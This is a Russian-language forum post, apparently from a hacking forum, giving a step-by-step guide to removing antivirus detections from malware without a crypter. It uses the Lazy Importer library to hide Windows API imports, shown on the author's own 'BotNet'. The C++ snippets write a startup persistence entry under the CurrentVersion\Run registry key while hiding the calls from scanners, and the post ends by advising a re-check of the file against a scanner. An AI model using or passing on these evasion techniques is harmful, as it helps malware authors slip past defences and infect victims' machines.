[TrashCode #4] Гайд как убрать детекты с файла без криптора C++.

ПереигралВсех · 6 дек 2021

Всем привет! это краткий гайд о том, как убрать детекты с файла.
Сразу скажу, для данных манипуляций вам нужен исходный код программы.
Способ очень простой, и я думаю с ним справиться каждый!
Для примера, я взял "BotNet" с одной из моих прошлых статей. Статья

Скрин детектов до:

Скрин детектов после, будет в самом конце.

1. Что нам понадобится, это библиотека Lazy Importer. GutHub.
Подключаем данную библиотеку к проекту, тут я думаю вы справитесь сами, тк данный гайд не об этом.

2. Вам надо понять какую именно функцию детектит ваш антивирус, если вы не знаете, или не можете проверить, то скрывайте импорты всех функций.
В моём случае детектит запись в реестр, вот на примере её и будем работать!

Вот что есть у нас на данный момент.

3. Пишем код.
Попытаюсь максимально откомментировать код, но если будут вопросы, пишите в лс, помогу!
auto winreg = LI_FN(LoadLibraryA)("Advapi32.dll");
auto kernel = LI_FN(LoadLibraryA)("Kernel32.dll");
//Тут мы подключили dll из которых будем доставать функцию

if (LI_FN(RegCreateKeyExA).in(winreg)(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, 0, KEY_ALL_ACCESS, NULL, &hKey, NULL) == ERROR_SUCCESS)
{
if (LI_FN(RegSetValueExA).in(winreg)(hKey, "istream", NULL, REG_SZ, (LPBYTE)arr, sizeof(arr)) == ERROR_SUCCESS)
{
LI_FN(RegCloseKey).in(winreg)(hKey);
}
return;
}

//Что у нас получилось в итоге

Код
auto winreg = LI_FN(LoadLibraryA)("Advapi32.dll");

auto kernel = LI_FN(LoadLibraryA)("Kernel32.dll");

//Тут мы подключили dll из которых будем доставать функцию



    if (LI_FN(RegCreateKeyExA).in(winreg)(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, 0, KEY_ALL_ACCESS, NULL, &hKey, NULL) == ERROR_SUCCESS)

    {

        if (LI_FN(RegSetValueExA).in(winreg)(hKey, "istream", NULL, REG_SZ, (LPBYTE)arr, sizeof(arr)) == ERROR_SUCCESS)

        {

            LI_FN(RegCloseKey).in(winreg)(hKey);

        }

        return;

    }



//Что у нас получилось в итоге
4. О коде.

auto winreg = LI_FN(LoadLibraryA)("Advapi32.dll");

Код

auto winreg = LI_FN(LoadLibraryA)("Advapi32.dll");

Тут, например вместо Advapi32.dll надо писать название своей dll к которой привязана функция, где её брать?
В поисковик пишем название функции, например: RegCreateKeyEx, и переходим на офф сайт майкрософт, и листаем страницу вниз.
Вот название DLL.
LI_FN(RegSetValueExA).in(winreg)(hKey, "istream", NULL, REG_SZ, (LPBYTE)arr, sizeof(arr)

Код
LI_FN(RegSetValueExA).in(winreg)(hKey, "istream", NULL, REG_SZ, (LPBYTE)arr, sizeof(arr)
FI_FN - вызываем Lazy Importer
(RegSetValueExA) - Название функции
.in(winreg) - откуда мы импортируем эту функцию (auto winreg = LI_FN(LoadLibraryA)("Advapi32.dll");)

Покажу ещё тоже самое раз но например на MessageBox.

auto user32 = LI_FN(LoadLibraryA)("User32.dll"); //Загружаем DLL [/B][/B]
[B][B]LI_FN(MessageBoxA).in(user32)(0, "ItWork!", "ItWork!", MB_OK); //Вызываем функцию

Код

auto user32 = LI_FN(LoadLibraryA)("User32.dll"); //Загружаем DLL [/B][/B] [B][B]LI_FN(MessageBoxA).in(user32)(0, "ItWork!", "ItWork!", MB_OK); //Вызываем функцию

5. После того как мы скрыли импорты, заливаем файл на сканер.

Готово!

На этом, всё.
К слову скажу, что-бы не было негатива, это не единственный способ, и не всегда самый действенный, но он работает!

Не откажусь от звезды на GitHub в знак благодарности.
Всем спасибо!